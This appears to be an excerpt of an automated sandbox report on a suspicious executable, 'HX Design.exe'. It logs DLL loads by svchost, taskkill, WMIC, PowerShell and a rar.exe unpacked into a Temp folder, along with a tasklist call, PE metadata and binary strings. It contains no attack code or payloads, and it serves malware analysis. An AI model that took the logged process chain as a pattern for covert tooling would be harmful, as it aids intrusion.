Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\System32\tasklist.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: HX Design.exe

Static PE information: certificate valid

Source: HX Design.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: HX Design.exe

Static file information: File size 9441536 > 1048576

Source: HX Design.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: HX Design.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: HX Design.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: HX Design.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: HX Design.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: HX Design.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: HX Design.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: HX Design.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdb source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: HX Design.exe, 00000001.00000002.2110666490.00007FFE11501000.00000040.00000001.01000000.00000007.sdmp
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672348988.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: >c.pdb source: powershell.exe, 00000028.00000002.1946049803.000001D19A990000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: HX Design.exe, 00000001.00000002.2106827061.00007FFDFB868000.00000040.00000001.01000000.00000005.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672257497.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673117684.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671566567.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670767468.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669477724.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670483179.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: HX Design.exe, 00000001.00000002.2111613092.00007FFE130C1000.00000040.00000001.01000000.0000000E.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdbhP8 source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669276073.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671162659.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672433558.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672984815.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: HX Design.exe, 00000001.00000002.2109362535.00007FFE0E15E000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670566316.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB152000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HX Design.exe, 00000000.00000003.1667874865.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2113107108.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670164178.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671342461.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HX Design.exe, 00000001.00000002.2110372375.00007FFE10301000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
